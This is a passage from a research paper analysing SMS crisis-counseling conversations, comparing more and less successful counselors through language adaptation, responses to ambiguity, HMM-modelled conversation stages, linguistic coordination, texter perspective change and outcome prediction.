ical clusters, or stages. Most approaches employ Hidden Markov Model-like models (Barzilay and Lee, 2004; Ritter et al., 2010; Paul, 2012; Yang et al., 2014) which are also used in this work to model progression through conversation stages. Very recently, technology-mediated counseling has allowed the collection of large datasets on coun- seling. Howes et al. (2014) find that symptom sever- ity can be predicted from transcript data with com- parable accuracy to face-to-face data but suggest that insights into style and dialogue structure are needed to predict measures of patient progress. Counseling datasets have also been used to predict the conversa- tion outcome (Huang, 2015) but without modeling the within-conversation dynamics that are studied in this work. Other work has explored how novel inter- faces based on topic models can support counselors during conversations (Dinakar et al., 2014a; 2014b; 2015; Chen, 2014). Our work joins these two lines of research by de- veloping computational discourse analysis methods applicable to large datasets that are grounded in ther- apeutic discourse analysis and psycholinguistics. 3 Dataset Description In this work, we study anonymized counseling con- versations from a not-for-profit organization provid- ing free crisis intervention via SMS messages. Text- based counseling conversations are particularly well suited for conversation analysis because all interac- tions between the two dialogue partners are fully ob- served (i.e., there are no non-textual or non-verbal cues). Moreover, the conversations are important, constrained to dialogue between two people, and outcomes can be clearly defined (i.e., we follow up with the conversation partner as to whether they feel better afterwards), which enables the study of how conversation features are associated with actual out- comes. Counseling Process. Any person in distress can text the organization’s public number. Incoming re- quests are put into a queue and an available coun- Dataset statistics Conversations 80,885 Conversations with survey response 15,555 (19.2%) Messages 3.2 million Messages with survey response 663,026 (20.6%) Counselors 408 Messages per conversation* 42.6 Words per message* 19.2 Table 1: Basic dataset statistics. Rows marked with * are computed over conversations with survey responses. selor picks the request from the queue and engages with the incoming conversation. We refer to the cri- sis counselor as the counselor and the person in dis- tress as the texter. After the conversation ends, the texter receives a follow-up question (“How are you feeling now? Better, same, or worse?”) which we use as our conversation quality ground-truth (we use binary labels: good versus same/worse, since we care about improving the situation). In contrast to previous work that has used human judges to rate a caller’s crisis state (Kalafat et al., 2007), we di- rectly obtain this feedback from the texter. Further- more, the counselor fills out a post-conversation re- port (e.g., suicide risk, main issue such as depres- sion, relationship, self-harm, suicide, etc.). All crisis counselors receive extensive training and commit to weekly shifts for a full year. Dataset Statistics. Our dataset contains 408 coun- selors and 3.2 million messages in 80,885 conversa- tions between November 2013 and November 2014 (see Table 1). All system messages (e.g., instruc- tions), as well as texts that contain survey responses (revealing the ground-truth label for the conversa- tion) were filtered out. Out of these conversations, we use the 15,555, or 19.2%, that contain a ground- truth label (whether the texter feels better or the same/worse after the conversation) for the follow- ing analyses. Conversations span a variety of issues of different difficulties (see rows one and two of Ta- ble 2). Approval to analyze the dataset was obtained from the Stanford IRB. 4 Defining Counseling Quality The primary goal of this paper is to study strategies that lead to conversations with positive outcomes. Thus, we require a ground-truth notion of conver- sation quality. In principle, we could study individ- NA Depressed Relationship Self harm Family Suicide Stress Anxiety Other Success rate 0.556 0.612 0.659 0.672 0.711 0.573 0.696 0.671 0.537 Frequency 0.200 0.200 0.089 0.074 0.071 0.063 0.041 0.039 0.035 Frequency with more successful counselors 0.203 0.199 0.089 0.067 0.072 0.061 0.048 0.042 0.030 Frequency with less successful counselors 0.223 0.208 0.087 0.070 0.067 0.056 0.030 0.032 0.028 Table 2: Frequencies and success rates for the nine most common conversation issues (NA: Not available). On average, more and less successful counselors face the same distribution of issues. ual conversations and aim to understand what fac- tors make the conversation partner (texter) feel bet- ter. However, it is advantageous to focus on the conversation actor (counselor) instead of individual conversations. There are several benefits of focusing analy- ses on counselors (rather than individual conversa- tions): First, we are interested in general conversa- tion strategies rather than properties of main issues (e.g., depression vs. suicide). While each conver- sation is different and will revolve around its main issue, we assume that counselors have a particular style and strategy that is invariant across conversa- tions. Second, we assume that conversation qual- ity is noisy. Even a very good counselor will face some hard conversations in which they do every- thing right but are still unable to make their conver- sation partner feel better. Over time, however, the “true” quality of the counselor will become appar- ent. Third, our goal is to understand successful con- versation strategies and to make use of these insights in counselor training. Focusing on the counselor is helpful in understanding, monitoring, and improv- ing counselors’ conversation strategies. More vs. Less Successful Counselors. We split the counselors into two groups and then compare their behavior. Out of the 113 counselors with more than 15 labeled conversations of at least 30 messages each, we use the most successful 40 counselors as “more successful” counselors and the bottom 40 as “less successful” counselors. Their average success rates are 66.3-85.5% and 42.1-58.6%, respectively. While the counselor-level analysis is of primary con- cern, we will also differentiate between counselor behavior in “positive” versus “negative” conversa- tions (i.e., those that will eventually make the texter feel better vs. not). Thus, in the remainder of the paper we differentiate between more vs. less suc- cessful counselors and positive vs. negative conver- 0-20 20-40 40-60 60-80 80-100 Portion of conversation (% of messages) 12 14 16 18 20 22 24 A ve ra ge m es sa ge le ng th More successful counselors, positive conversations More successful counselors, negative conversations Less successful counselors, positive conversations Less successful counselors, negative conversations Figure 1: Differences in counselor message length (in #tokens) over the course of the conversation are larger between more and less successful counselors (blue cir- cle/red square) than between positive and negative con- versations (solid/dashed). Error bars in all plots corre- spond to bootstrapped 95% confidence intervals using the member bootstrapping technique from Ren et al. (2010). sations. Studying the cross product of counselors and conversations allows us to gain insights on how both groups behave in positive and negative conver- sations. For example, Figure 1 illustrates why differ- entiating between counselors and as well as conver- sations is necessary: differences in counselor mes- sage length over the course of the conversation are bigger between more and less successful counselors than between positive and negative conversations. Initial Analysis. Before focusing on detailed anal- yses of counseling strategies we address two impor- tant questions: Do counselors specialize in certain issues? And, do successful counselors appear suc- cessful only because they handle “easier” cases? To gain insights into the “specialization hypoth- esis” we make use the counselor annotation of the main issue (depression, self-harm, etc.). We com- pare success rates of counselors across different issues and find that successful counselors have a higher fraction of positive conversations across all issues and that less successful counselors typically do not excel at a particular issue. Thus, we conclude that counseling quality is a general trait or skill and supporting that the split into more and less success- ful counselors is meaningful. Another simple explanation of the differences be- tween more and less successful counselors could be that successful counselors simply pick “easy” issues. However, we find that this is not the case. In par- ticular, we find that both counselor groups are very similar in how they select conversations from the queue (picking the top-most in 60.1% vs. 60.3%, respectively), work similar shifts, and handle a sim- ilar number of conversations simultaneously (1.98 vs. 1.83). Further, we find that both groups face sim- ilar distributions of issues over time (see Table 2). We attribute the largest difference, “NA” (main issue not reported), to the more successful counselors be- ing more diligent in filling out the post-conversation report and having fewer conversations that end be- fore the main issue is introduced. 5 Counselor Adaptability In the remainder of the paper we focus on factors that mediate the outcome of a conversation. First, we examine whether successful counselors are more aware that their current conversation is going well or badly and study how the counselor adapts to the situation. We investigate this question by looking for language differences between positive and neg- ative conversations. In particular, we compute a distance measure between the language counselors use in positive conversations and the language coun- selors use in negative conversations and observe how this distance changes over time. We capture the time dimension by breaking up each conversation into five even chunks of messages. Then, for each set of counselors (more successful or less successful), conversation outcome (positive or negative), and chunk (first 20%, second 20%, etc.), we build a TF-IDF vector of word occurrences to represent the language of counselors within this subset. We use the global inverse document (i.e., conversation) frequencies instead of the ones from each subset to make the vectors directly comparable and control for different counselors having differ- ent numbers of conversations by weighting conver- sations so all counselors have equal contributions. We then measure the difference between the “posi- 0-20 20-40 40-60 60-80 80-100 3ortLon of conversDtLon (% of PessDges) 0.012 0.013 0.014 0.015 0.016 0.017 0.018 0.019 D Ls tD nc e be tw ee n po sL tLv e D nd n eg Dt Lv e co nv er sD tLo ns 0ore successful counselors Less successful counselors Figure 2: More successful counselors are more varied in their language across positive/negative conversations, suggesting they adapt more. All differences between more successful and less successful counselors except for the 0-20 bucket were found to be statistically significant (p < 0.05; bootstrap resampling test). tive” and “negative” vector representations by taking the cosine distance in the induced vector space. We also explored using Jensen-Shannon divergence be- tween traditional probabilistic language models and found these methods gave similar results. Results. We find more successful counselors are more sensitive to whether the conversation is going well or badly and vary their language accordingly (Figure 2). At the beginning of the conversation, the language between positive and negative conver- sations is quite similar, but then the distance in lan- guage increases over time. This increase in distance is much larger for more successful counselors than less successful ones, suggesting they are more aware of when conversations are going poorly and adapt their counseling more in an attempt to remedy the situation. 6 Reacting to Ambiguity Observing that successful counselors are better at adapting to the conversation, we next examine how counselors differ and what factors determine the dif- ferences. In particular, domain experts have sug- gested that more successful counselors are better at handling ambiguity in the conversation (Levitt and Jacques, 2005). Here, we use ambiguity to refer to the uncertainty of the situation and the texter’s ac- tual core issue resulting from insufficiently short or uncertain descriptions. Does initial ambiguity of the situation negatively affect the conversation? How do more successful counselors deal with ambiguous sit- uations? [4, 9] (9, 16] (16, 24] (24, 33] (33, 632] Length of situation setter (#tokens) 0.4 0.5 0.6 0.7 0.8 F ra ct io n o f p o si tiv e c o n v. More successful Less successful Figure 3: More ambiguous situations (length of situation setter) are less likely to result in positive conversations. (4, 8] (8, 15] (15, 23] (23, 32] (32, 476] Length of situation setter (#tokens) 0.0 0.5 1.0 1.5 2.0 2.5 |R e sp o n se | / |S itu a tio n s e tt e r| Counselor quality More successful Less successful Figure 4: All counselors react to short, ambiguous mes- sages by writing more (relative to the texter message) but more successful counselors do it more than less success- ful counselors. Ambiguity. Throughout this section we measure ambiguity in the conversation as the shortness of the texter’s responses in number of words. While ambi- guity could also be measured through concreteness ratings of the words in each message (e.g., using concreteness ratings from Brysbaert et al. (2014)), we find that results are very similar and that length and concreteness are strongly related and hard to distinguish. 6.1 Initial Ambiguity and Situation Setter It is challenging to measure ambiguity and reactions to ambiguity at arbitrary points throughout the con- versation since it strongly depends on the context of the entire conversation (i.e., all earlier messages and questions). However, we can study nearly identi- cal beginnings of conversations where we can di- rectly compare how more successful and less suc- cessful counselors react given nearly identical situa- tions (the texter first sharing their reason for texting in). We identify the situation setter within each con- versation as the first long message by the texter (typ- ically a response to a “Can you tell me more about what is going on?” question by the counselor). Results. We find that ambiguity plays an important role in counseling conversations. Figure 3 shows that more ambiguous situations (shorter length of situation setter) are less likely to result in success- ful conversations (we obtain similar results when measuring concreteness (Brysbaert et al., 2014) di- rectly). Further, we find that counselors generally react to short and ambiguous situation setters by writing significantly more than the texters (Figure 4; if counselors wrote exactly as much as the texter, we would expect a horizontal line y = 1). How- ever, more successful counselors react more strongly to ambiguous situations than less successful coun- selors. 6.2 How to Respond to Ambiguity Having observed that ambiguity plays an important role in counseling conversations, we now examine in greater detail how counselors respond to nearly identical situations. We match situation setters by representing them through TF-IDF vectors on bigrams and find similar situation setters as nearest neighbors within a certain cosine distance in the induced space.1 We only con- sider situation setters that are part of a dense cluster with at least 10 neighbors, allowing us to compare follow-up responses by the counselors (4829/12770 situation setters were part of one of 589 such clus- ters). We also used distributed word embeddings (e.g., (Mikolov et al., 2013)) instead of TF-IDF vec- tors but found the latter to produce better clusters. Based on counselor training materials we hypoth- esize that more successful counselors • address ambiguity by writing more themselves, • use more check questions (statements that tell the conversation partner that you understand 1 Threshold manually set after qualitative analysis of matches from randomly chosen clusters. Results were not overly sensitive to threshold choice, choice of representation (e.g., word vectors), and distance measure (e.g., Euclidean). More S. Less S. Test % conversations successful 70.7 51.7 *** #messages in conversation 57.0 46.7 *** Situation setter length (#tokens) 12.1 10.7 *** C response length (#tokens) 15.8 11.8 *** T response length (#tokens) 20.4 18.8 *** % Cosine sim. C resp. to context 11.9 14.8 *** % Cosine sim. T resp. to context 7.6 7.3 – % C resp. w check question 12.6 4.1 *** % C resp. w suicide check 13.5 10.3 *** % C resp. w thanks 6.3 2.4 *** % C resp. w hedges 41.4 36.8 *** % C resp. w surprise 3.3 2.8 – Table 3: Differences between more and less success- ful counselors (C; More S. and Less S.) in responses to nearly identical situation setters (Sec. 6.1) by the texter (T). Last column contains significance levels of Wilcoxon Signed Rank Tests (*** p < 0.001, – p > 0.05). them while avoiding the introduction of any opinion or advice (Labov and Fanshel, 1977); e.g.“that sounds like...”), • check for suicidal thoughts early (e.g., “want to die”), • thank the texter for showing the courage to talk to them (e.g., “appreciate”), • use more hedges (mitigating words used to lessen the impact of an utterance; e.g., “maybe”, “fairly”), • and that they are less likely to respond with sur- prise (e.g., “oh, this sounds really awful”). A set of regular expressions is used to detect each class of responses (similar to the examples above). Results. We find several statistically significant dif- ferences in how counselors respond to nearly iden- tical situation setters (see Table 3). While situation setters tend to be slightly longer for more success- ful counselors (suggesting that conversations are not perfectly randomly assigned), counselor responses are significantly longer and also spur longer texter responses. Further, the more successful counselors respond in a way that is less similar to the original situation setter (measured by cosine similarity in TF- IDF space) compared to less successful counselors (but the texter’s response does not seem affected). We do find that more successful counselors use more check questions, check for suicide ideation more of- ten, show the texter more appreciation, and use more hedges, but we did not find a significant difference with respect to responding with surprise. More successful Less successful Counselor quality 8 10 12 14 16 18 20 22 24 # S im ila r co u n se lo r re a ct io n s Conversation quality Positive Negative Figure 5: More successful counselors use less com- mon/templated responses (after the texter first explains the situation). This suggests that they respond in a more creative way. There is no significant difference between positive and negative conversations. 6.3 Response Templates and Creativity In Section 6.2, we observed that more successful counselors make use of certain templates (including check questions, checks for suicidal thoughts, affir- mation, and using hedges). While this could suggest that counselors should stick to such predefined tem- plates, we find that, in fact, more successful coun- selors do respond in more creative ways. We define a measure of how “templated” the counselors responses are by counting the number of similar responses in TF-IDF space for the counselor reaction (c.f., Section 6.2; again using a manually defined and validated threshold on cosine distance). Figure 5 shows that more successful counselors use less common/templated questions. This sug- gests that while more successful counselors ques- tions follow certain patterns, they are more creative in their response to each situation. This tailoring of responses requires more effort from the counselor, which is consistent with the results in Figure 1 that showed that more successful counselors put in more effort in composing longer messages as well. 7 Ensuring Conversation Progress After demonstrating content-level differences be- tween counselors, we now explore temporal differ- ences in how counselors progress through conversa- tions. Using an unsupervised conversation model, we are able to discover distinct conversation stages and find differences between counselors in how they move through these stages. We further provide ev- idence that these differences could be related to power and authority by measuring linguistic coor- dination between the counselor and texter. 7.1 Unsupervised Conversation Model Counseling conversations follow a common struc- ture due to the nature of conversation as well as counselor training. Typically, counselors first intro- duce themselves, get to know the texter and their situation, and then engage in constructive prob- lem solving. We employ unsupervised conversation modeling techniques to capture this stage-like struc- ture within conversations. Our conversation model is a message-level Hid- den Markov Model (HMM). Figure 6 illustrates the basic model where hidden states of the HMM rep- resent conversation stages. Unlike in prior work on conversation modeling, we impose a fixed ordering on the stages and only allow transitions from the cur- rent stage to the next one (Figure 7). This causes it to learn a fixed dialogue structure common to all of the counseling sessions as opposed to conversa- tion topics. Furthermore, we separately model coun- selor and texter messages by treating their turns in the conversation as distinct states. We train the con- versation model with expectation maximization, us- ing the forward-backward algorithm to produce the distributions during each expectation step. We ini- tialized the model with each stage producing mes- sages according to a unigram distribution estimated from all messages in the dataset and uniform transi- tion probabilities. The unigram language models are defined over all words occurring more than 20 times (over 98% of words in the dataset), with other words replaced by an unknown token. Results. We explored training the model with vari- ous numbers of stages and found five stages to pro- duce a distinct and easily interpretable representa- tion of a conversation’s progress. Table 4 shows the words most unique to each stage. The first and last stages consist of the basic introductions and wrap- ups common to all conversations. In stage 2, the texter introduces the main issue, while the counselor asks for clarifications and expresses empathy for the situation. In stage 3, the counselor and texter dis- cuss the problem, particularly in relation to the other s1 Ck Ws0 w0,i s0 s2 w1,i w2,i Ws1 Ws2 Figure 6: Our conversation model generates a particular conversation Ck by first generating a sequence of hid- den states s0, s1, ... according to a Markov model. Each state si then generates a message as a bag of words wi,0, wi,1, ... according a unigram language model Wsi . Counselor turn Texter turn Stage 1 c1 Stage 2 Stage k c2 ck t1 t2 tk Figure 7: Allowed state transitions for the conversation model. Counselor and texter messages are produced by distinct states and conversations must progress through the stages in increasing order. people involved. In stage 4, the counselor and tex- ter discuss actionable strategies that could help the texter. This is a well-known part of crisis counselor training called “collaborative problem solving.” 7.2 Analyzing Counselor Progression Do counselors differ in how much time they spend at each stage? In order to explore how counselors progress through the stages, we use the Viterbi al- gorithm to assign each conversation the most likely sequence of stages according to our conversation model. We then compute the average duration in messages of each stage for both more and less suc- cessful counselors. We control for the different distributions of positive and negative conversations among more successful and less successful coun- selors by giving the two classes of conversations equal weight and control for different conversation lengths by only including conversations between 40 and 60 messages long. Results. We find that more successful counselors are quicker to move past the earlier stages, partic- Stage Interpretation Top words for texter Top words for counselor 1 Introductions hi, hello, name, listen, hey hi, name, hello, hey, brings 2 Problem introduction dating, moved, date, liked, ended gosh, terrible, hurtful, painful, ago 3 Problem exploration knows, worry, burden, teacher, group react, cares, considered, supportive, wants 4 Problem solving write, writing, music, reading, play hobbies, writing, activities, distract, music 5 Wrap up goodnight, bye, thank, thanks, appreciate goodnight, 247, anytime, luck, 24 Table 4: The top 5 words for counselors and texters with greatest increase in likelihood of appearing in each stage. The model successfully identifies interpretable stages consistent with counseling guidelines (qualitative interpretation based on stage assignment and model parameters; only words occurring more than five hundred times are shown). 1 2 3 4 5 Stage 0.00 0.05 0.10 0.15 0.20 0.25 0.30 0.35 0.40 S ta ge d ur at io n (p er ce nt o f c on ve rs at io n) More successful counselors Less successful counselors Figure 8: More successful counselors are quicker to get to know texter and issue (stage 2) and use more of their time in the “problem solving” phase (stage 4). ularly stage 2, and spend more time in later stages, particularly stage 4 (Figure 8). This suggests they are able to more quickly get to know the texter and then spend more time in the problem solving phase of the conversation, which could be one of the rea- sons they are more successful. 7.3 Coordination and Power Differences One possible explanation for the more successful counselors’ ability to quickly move through the early stages is that they have more “power” in the conversation and can thus exert more control over the progression of the conversation. We explore this idea by analyzing linguistic coordination, which measures how much the conversation partners adapt to each other’s conversational styles. Research has shown that conversation participants who have a greater position of power coordinate less (i.e., they do not adapt their linguistic style to mimic the other conversational participant as strongly) (Danescu- Niculescu-Mizil et al., 2012). In our analysis, we use the “Aggregated 2” coordi- nation measure C(B, A) from Danescu-Niculescu- Mizil (2012), which measures how much group B coordinates to group A (a higher number means more coordination). The measure is computed by counting how often specific markers (e.g., auxiliary verbs) are exhibited in conversations. If someone tends to use a particular marker right after their con- versation partner uses that marker, it suggests they are coordinating to their partner. Formally, let set S be a set of exchanges, each involving an initial utterance u1 by a ∈ A and a reply u2 by b ∈ B. Then the coordination of b to A according to a linguistic marker m is: Cm(b, A) = P(Emu2→u1|E m u1 )−P(Emu2→u1) where Emu1 is the event that utterance u1 exhibits m (i.e., contains a word from category m) and Emu2→u1 is the event that reply u2 to u1 exhibits m. The prob- abilities are estimated across all exchanges in S. To aggregate across different markers, we average the coordination values of Cm(b, A) over all markers m to get a macro-average C(b, A). The coordination between groups B and A is then defined as the mean of the coordinations of all members of group B to- wards the group A. We use eight markers from Danescu-Niculescu- Mizil (2012), which are considered to be processed by humans in a generally non-conscious fashion: ar- ticles, auxiliary verbs, conjunctions, high-frequency adverbs, indefinite pronouns, personal pronouns, prepositions, and quantifiers. Results. Texters coordinate less than coun- selors, with texters having a coordination value of C(texter, counselor)=0.019 compared to the counselor’s C(counselor, texter)=0.030, suggest- ing that the texters hold more “power” in the conversation. However, more successful counselors coordinate less than less successful ones (C(more succ. counselors, texter)=0.029 vs. C(less succ. counselors, texter)=0.032). All differ- ences are statistically significant (p < 0.01; Mann- Whitney U test). This suggests that more successful counselors act with more control over the conversa- tion, which could explain why they are quicker to make it through the initial conversation stages. 8 Facilitating Perspective Change Thus far, we have studied conversation dynamics and their relation to conversation success from the counselor perspective. In this section, we show that perspective change in the texter over time is asso- ciated with a higher likelihood of conversation suc- cess. Prior work has shown that day-to-day changes in writing style are associated with positive health outcomes (Campbell and Pennebaker, 2003), and existing theories link depression to a negative view of the future (Pyszczynski et al., 1987) and a self- focusing style (Pyszczynski and Greenberg, 1987). Here, we propose a novel measure to quantify three orthogonal aspects of perspective change within a single conversation: time, self, and sentiment. Fur- ther, we show that the counselor might be able to actively induce perspective change. Time. Texters start explaining their issue largely in terms of the past and present but over time talk more about the future (see Figure 9A; each plot shows the relative amount of words in the LIWC past, present, and future categories (Tausczik and Pennebaker, 2010)). We find that texters writing more about the future are more likely to feel better after the conversation. This suggests that changing the perspective from issues in the past towards the future is associated with a higher likelihood of suc- cessfully working through the crisis. Self. Another important aspect of behavior change is to what degree the texter is able to change their perspective from talking about themselves to con- sidering others and potentially the effect of their sit- uation on others (Pyszczynski and Greenberg, 1987; Campbell and Pennebaker, 2003). We measure how much the texter is focused on themselves by the rela- tive amount of first person singular pronouns (I, me, mine) versus third person singular/plural pronouns (she, her, him / they, their), again using LIWC. Fig- ure 9B shows that a smaller amount of self-focus is associated with more successful conversations (pro- viding support for the self-focus model of depres- sion (Pyszczynski and Greenberg, 1987)). We hy- pothesize that the lack of difference at the end of the conversation is due to conversation norms such as thanking the counselor (“I really appreciate it.”) even if the texter does not actually feel better. Sentiment. Lastly, we investigate how much a change in sentiment of the texter throughout the con- versation is associated with conversation success. We measure sentiment as the relative fraction of pos- itive words using the LIWC PosEmo and NegEmo sentiment lexicons. The results in Figure 9C show that texters always start out more negative (value be- low 0.5), but that the sentiment becomes more posi- tive over time for both positive and negative conver- sations. However, we find that the separation be- tween both groups grows larger over time, which suggests that a positive perspective change through- out the conversation is related to higher likelihood of conversation success. We find that both curves increase significantly at the very end of the con- versation. Again, we attribute this to conversation norms such as thanking the counselor for listening even when the texter does not actually feel better. Together with the result on talking about the fu- ture, these findings are consistent with the theory of Pyszczynski et al. (1987) that depression is related to a negative view of the future. Role of a Counselor. Given that positive conver- sations often exhibit perspective change, a natural question is how counselors can encourage perspec- tive change in the texter. We investigate this by ex- ploring the hypothesis that the texter will tend to talk more about something (e.g., the future), if the coun- selor first talks about it. We measure this tendency using the same coordination measures as Section 7.3 except that instead of using stylistic LIWC markers (e.g., auxiliary verbs, quantifiers), we use the LIWC markers relevant to the particular aspect of perspec- tive change (e.g., Future, HeShe, PosEmo). In all cases we find a statistically significant (p < 0.01; Mann-Whitney U-test) increase in the likelihood of the texter using a LIWC marker if the counselor used it in the previous message (~4-5% change). This link between perspective change and how the counselor conducts the conversation suggests that the coun- selor might be able to actively induce measurable perspective change in the texter. 0-20 20-40 40-60 60-80 80-100 3ortion of Fonversation (% of Pessages) 0.06 0.07 0.08 0.09 0.10 0.11 0.12 0.13 0.14 0.15 ) ut ur e re la tiv e fr eq ue nF y 3ositive Fonversations 1egative Fonversations 0-20 20-40 40-60 60-80 80-100 3ortion of conversation (% of Pessages) 0.12 0.14 0.16 0.18 0.20 0.22 0.24 0.26 0.28 0.30 3 as t r el at iv e fr eq ue nc y 3ositive conversations 1egative conversations 0-20 20-40 40-60 60-80 80-100 Portion of conversation (% of Pessages) 0.60 0.62 0.64 0.66 0.68 0.70 0.72 0.74 0.76 P re se nt r el at iv e fr eq ue nc y Positive conversations 1egative conversations 0-20 20-40 40-60 60-80 80-100 Portion of conversation (% of Pessages) 0.70 0.75 0.80 0.85 6 el f r el at iv e fr eq ue nc y Positive conversations 1egative conversations 0-20 20-40 40-60 60-80 80-100 Portion of conversation (% of Pessages) 0.4 0.5 0.6 0.7 0.8 P os eP o re la tiv e fr eq ue nc y Positive conversations 1egative conversations A1: Past B: Self C: Sentiment A2: Present A3: Future Figure 9: A: Throughout the conversation there is a shift from talking about the past to future, where in positive conversations this shift is greater; B: Texters that talk more about others more often feel better after the conversation; C: More positive sentiment by the texter throughout the conversation is associated with successful conversations. 9 Predicting Counseling Success In this section, we combine our quantitative insights into a prediction task. We show that the linguistic as- pects of crisis counseling explored in previous sec- tions have predictive power at the level of individ- ual conversations by evaluating their effectiveness as features in classifying the outcome of conversations. Specifically, we create a balanced dataset of positive and negative conversations more than 30 messages long and train a logistic regression model to predict the outcome given the first x% of messages in the conversation. There are 3619 such negative conver- sations and and we randomly subsample the larger set of positive conversations. We train the model with batch gradient descent and use L1 regulariza- tion when n-gram features are present and L2 reg- ularization otherwise. We evaluate our model with 10-fold cross-validation and compare models using the area under the ROC curve (AUC). Features. We include three aspects of counselor messages discussed in Section 6: hedges, check questions, and the similarity between the counselor’s message and previous texter message. We add a measure of how much progress the counselor has made (Section 7) by computing the Viterbi path of stages for the conversation (only for the first x%) with the HMM conversation model and then adding the duration of each stage (in #messages) as a fea- ture. Additionally, we add average message length 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0 Percent of conversation seen by the model 0.56 0.58 0.60 0.62 0.64 0.66 0.68 0.70 0.72 R O C a re a un de r th e cu rv e sc or e Full model N-gram features only Figure 10: Prediction accuracies vs. percent of the con- versation seen by the model (without texter features). and average sentiment per message using VADER sentiment (Hutto and Gilbert, 2014). Further, we add temporal dynamics to the model by adding fea- ture conjunctions with the stages HMM model. Af- ter running the stages model over the x% of the con- versation available to the classifier, we add each fea- ture’s average value over each stage as additional features. Lastly, we explore the benefits of adding surface-level text features to the model by adding unigram and bigram features. Because the focus of this work is on counseling strategies, we primar- ily experiment with models using only features from counselor messages. For completeness, we also re- port results for a model including texter features. Prediction Results. The model’s accuracy increases with x, and we show that the model is able to dis- Features ROC AUC Counselor unigrams only 0.630 Counselor unigrams and bigrams only 0.638 None 0.5 + hedges 0.514 (+0.014) + check questions 0.546 (+0.032) + similarity to last message 0.553 (+0.007) + duration of each stage 0.561 (+0.008) + sentiment 0.590 (+0.029) + message length 0.596 (+0.006) + stages feature conjunction 0.606 (+0.010) + counselor unigrams and bigrams 0.652 (+0.046) + texter unigrams and bigrams 0.708 (+0.056) Table 5: Performance of nested models predicting con- versation outcome given the first 80% of the conversa- tion. In bold: full models with only counselor features and with additional texter features. tinguish positive and negative conversations after only seeing the first 20% of the conversation (see Figure 10). We attribute the significant increase in performance for x = 100 (Accuracy=0.687, AUC=0.716) to strong linguistic cues that appear as a conversation wraps up (e.g., “I’m glad you feel better.”). To avoid this issue, our detailed feature analysis is performed at x = 80. Feature Analysis. The model performance as fea- tures are incrementally added to the model is shown in Table 5. All features improve model accuracy sig- nificantly (p < 0.001; paired bootstrap resampling test). Adding n-gram features produces the largest boost in AUC and significantly improves over a model just using n-gram features (0.638 vs. 0.652 AUC). Note that most features in the full model are based on word frequency counts that can be derived from n-grams which explains why a simple n-gram model already performs quite well. However, our model performs well with only a small set of lin- guistic features, demonstrating they provide a sub- stantial amount of the predictive power. The effec- tiveness of these features shows that, in addition to exhibiting group-level differences reported earlier in this paper, they provide useful signal for predicting the outcome of individual conversations. 10 Conclusion & Future Work Knowledge about how to conduct a successful coun- seling conversation has been limited by the fact that studies have remained largely qualitative and small- scale. In this work, we presented a large-scale quan- titative study on the discourse of counseling con- versations. We developed a set of novel computa- tional discourse analysis methods suited for large- scale datasets and used them to discover actionable conversation strategies that are associated with bet- ter conversation outcomes. We hope that this work will inspire future generations of tools available to people in crisis as well as their counselors. For ex- ample, our insights could help improve counselor training and give rise to real-time counseling qual- ity monitoring and answer suggestion support tools. Acknowledgements. We thank Bob Filbin for fa- cilitating the research, Cristian Danescu-Niculescu- Mizil for many helpful discussions, and Dan Ju- rafsky, Chris Manning, Justin Cheng, Peter Clark, David Hallac, Caroline Suen, Yilun Wang and the anonymous reviewers for their valuable feedback on the manuscript. This research has been sup- ported in part by NSF CNS-1010921, IIS-1149837, NIH BD2K, ARO MURI, DARPA XDATA, DARPA SIMPLEX, Stanford Data Science Initiative, Boe- ing, Lightspeed, SAP, and Volkswagen. References Tim Althoff and Jure Leskovec. 2015. Donor retention in online crowdfunding communities: A case study of DonorsChoose.org. In WWW. Tim Althoff, Cristian Danescu-Niculescu-Mizil, and Dan Jurafsky. 2014. How to ask for a favor: A case study on the success of altruistic requests. In ICWSM. Vikas Ganjigunte Ashok, Song Feng, and Yejin Choi. 2013. Success with style: Using writing style to pre- dict the success of novels. In EMNLP. Regina Barzilay and Lillian Lee. 2004. Catching the drift: Probabilistic content models, with applications to generation and summarization. In HLT-NAACL. Aaron T. Beck. 1967. Depression: Clinical, experimen- tal, and theoretical aspects. University of Pennsylva- nia Press. Philip Bramsen, Martha Escobar-Molano, Ami Patel, and Rafael Alonso. 2011. Extracting social power rela- tionships from natural language. In HLT-NAACL. Marc Brysbaert, Amy Beth Warriner, and Victor Kuper- man. 2014. Concreteness ratings for 40 thousand generally known English word lemmas. Behavior Re- search Methods, 46(3). R. Sherlock Campbell and James W. Pennebaker. 2003. The secret life of pronouns: Flexibility in writing style and physical health. Psychological Science, 14(1). Ge Chen. 2014. Visualizations for mental health topic models. Master’s thesis, MIT. Cristian Danescu-Niculescu-Mizil, Lillian Lee, Bo Pang, and Jon Kleinberg. 2012. Echoes of power: Language effects and power differences in social interaction. In WWW. Cristian Danescu-Niculescu-Mizil. 2012. A computa- tional approach to linguistic style coordination. Ph.D. thesis, Cornell University. Karthik Dinakar, Allison J.B. Chaney, Henry Lieberman, and David M. Blei. 2014a. Real-time topic models for crisis counseling. In KDD DSSG Workshop. Karthik Dinakar, Emily Weinstein, Henry Lieberman, and Robert Selman. 2014b. Stacked generalization learning to analyze teenage distress. In ICWSM. Karthik Dinakar, Jackie Chen, Henry Lieberman, Ros- alind Picard, and Robert Filbin. 2015. Mixed- initiative real-time topic modeling & visualization for crisis counseling. In ACM ICIUI. Marco Guerini, Alberto Pepe, and Bruno Lepri. 2012. Do linguistic style and readability of scientific ab- stracts affect their virality? In ICWSM. Shane Haberstroh, Thelma Duffey, Marcheta Evans, Robert Gee, and Heather Trepal. 2007. The experi- ence of online counseling. Journal of Mental Health Counseling, 29(3). Christine Howes, Matthew Purver, and Rose McCabe. 2014. Linguistic indicators of severity and progress in online text-based therapy for depression. CLPsych Workshop at ACL 2014. Rongyao Huang. 2015. Language use in teenage crisis intervention and the immediate outcome: A machine automated analysis of large scale text data. Master’s thesis, Columbia University. C.J. Hutto and Eric Gilbert. 2014. Vader: A parsimo- nious rule-based model for sentiment analysis of social media text. In ICWSM. Thomas R. Insel. 2008. Assessing the economic costs of serious mental illness. The American Journal of Psychiatry, 165(6). John Kalafat, Madelyn Gould, Jimmie Lou Harris Mun- fakh, and Marjorie Kleinman. 2007. An evaluation of crisis hotline outcomes part 1: Nonsuicidal crisis callers. Suicide and Life-threatening Behavior, 37(3). William Labov and David Fanshel. 1977. Therapeutic discourse: Psychotherapy as conversation. Dana Heller Levitt and Jodi D. Jacques. 2005. Promot- ing tolerance for ambiguity in counselor training pro- grams. The Journal of Humanistic Counseling, Edu- cation and Development, 44(1). Tomas Mikolov, Ilya Sutskever, Kai Chen, 